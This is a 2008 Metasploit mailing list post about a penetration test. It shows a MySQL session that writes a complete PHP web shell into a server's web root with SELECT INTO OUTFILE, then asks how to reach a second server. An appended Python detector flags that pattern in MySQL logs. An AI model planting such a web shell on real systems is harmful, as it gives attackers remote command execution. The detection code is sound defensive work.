Metasploit mailing list archives

SOME PENTESTING ROCK I HIT


From: chuksjonia at gmail.com (chuks Jonia)
Date: Mon, 28 Jul 2008 17:42:50 +0000

Thanks, Daniel, for the reply.

For the webserver, let's say the IP is 192.168.0.1; it has ports 3306 and
80 open. I was able to compromise this very fast, because the pages
used at the Care Center server were almost the same, so I could read
the config PHP files. For the next server, let's say 192.168.0.2 (though
in the real world it's a public IP, protected by a NetScreen from the
public), it has a webserver running on 443 and 80 and connects to
some financial companies, but its DB is running on another box,
192.168.0.3 (a public IP too, but also protected by a NetScreen). This DB
server has port 3306 open but no webserver running, and all the SQL
scripts are executed on the second private server.

Okay, for the first webserver, because ports 3306 and 80 were open it was
easy to do this:

mysql> CREATE TABLE chuks (codetab text);
ERROR 1046 (3D000): No database selected
mysql> use test
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> CREATE TABLE chuks (codetab text);
ERROR 1050 (42S01): Table 'chuks' already exists
mysql> DROP TABLE chuks;
Query OK, 0 rows affected (0.04 sec)

mysql> CREATE TABLE chuks (codetab text);
Query OK, 0 rows affected (0.05 sec)

mysql> INSERT INTO chuks (codetab) values ('<? $cmd =
$_REQUEST["-cmd"]; ?><html><head><title>Exec Shell code :: by
chuks</title></head><onLoad="document.forms[0].elements[-cmd].focus()"><form
method=POST><br><input type=TEXT name="-cmd" size=64
value="<?=$cmd?>"><hr><pre><? if($cmd != "") print Shell_Exec($cmd);
?></pre></form></body></html>');
Query OK, 1 row affected (0.06 sec)

mysql> SELECT * INTO OUTFILE '/var/www/html/wap/shell.php' from chuks;
Query OK, 1 row affected (0.04 sec)

The question is: is there any way I can write to another server if I
SELECT INTO OUTFILE on that path, and how can I do it?



/Chuks


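Added example, not from the thread or from Metasploit: a small Python detector for the pattern the post describes (a FILE-privileged account writing a script file into the web root with INTO OUTFILE), run over constructed MySQL general_log lines, plus an interpreter for the secure_file_priv setting that limits where such writes can land. The web-root paths, the log layout and the sample lines are assumptions.

```python
import re

# Constructed sample of MySQL general_log lines (not from the post); the layout
# mimics the classic general_log_file format: time, thread id, command, argument.
SAMPLE_LOG = """\
080728 17:40:01    12 Connect   webapp@192.168.0.1 on test
080728 17:40:05    12 Query     SELECT id, name FROM customers WHERE id = 42
080728 17:41:10    12 Query     CREATE TABLE chuks (codetab text)
080728 17:41:30    12 Query     SELECT * INTO OUTFILE '/var/www/html/wap/shell.php' from chuks
080728 17:42:00    13 Query     SELECT * INTO OUTFILE '/var/lib/mysql-files/export.csv' FROM orders
080728 17:42:09    13 Query     SELECT LOAD_FILE('/etc/hostname')
"""

WEB_ROOTS = ("/var/www", "/srv/www", "/usr/share/nginx/html")   # assumed document roots
SCRIPT_EXT = (".php", ".jsp", ".asp", ".aspx", ".cgi", ".pl")    # server-side script types

OUTFILE_RE = re.compile(r"INTO\s+(?:OUTFILE|DUMPFILE)\s+'([^']+)'", re.I)
LOADFILE_RE = re.compile(r"LOAD_FILE\s*\(", re.I)
# Timestamp is optional: the general log omits it for lines within the same second.
LINE_RE = re.compile(r"^(?P<ts>\d{6}\s+[\d:]+)?\s*(?P<thread>\d+)\s+(?P<cmd>\w+)\s+(?P<arg>.*)$")

def classify_query(sql):
    """Return the reasons a statement looks like file-system abuse ([] if none)."""
    reasons = []
    m = OUTFILE_RE.search(sql)
    if m:
        path = m.group(1)
        if path.startswith(WEB_ROOTS):       # file lands where the webserver will serve it
            reasons.append("outfile_in_webroot")
        if path.lower().endswith(SCRIPT_EXT):  # and it will be executed, not just served
            reasons.append("outfile_script_extension")
    if LOADFILE_RE.search(sql):              # same FILE privilege used to read the filesystem
        reasons.append("load_file_read")
    return reasons

def scan_general_log(text):
    """Return (thread_id, reasons, sql) for every Query line that trips a rule."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m or m.group("cmd") != "Query":
            continue
        reasons = classify_query(m.group("arg"))
        if reasons:
            hits.append((int(m.group("thread")), reasons, m.group("arg")))
    return hits

def secure_file_priv_verdict(value):
    """Interpret the value of SHOW VARIABLES LIKE 'secure_file_priv' as the client prints it."""
    if value is None or value.upper() == "NULL":
        return "disabled"      # file import/export is switched off entirely
    if value == "":
        return "unrestricted"  # FILE-privileged accounts can write anywhere mysqld can
    return "restricted"        # writes are confined to that one directory
```

An ordinary CSV export under the secure_file_priv directory produces no hit, so the rule stays quiet on routine use; the webroot write and the LOAD_FILE read are the two lines that surface.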
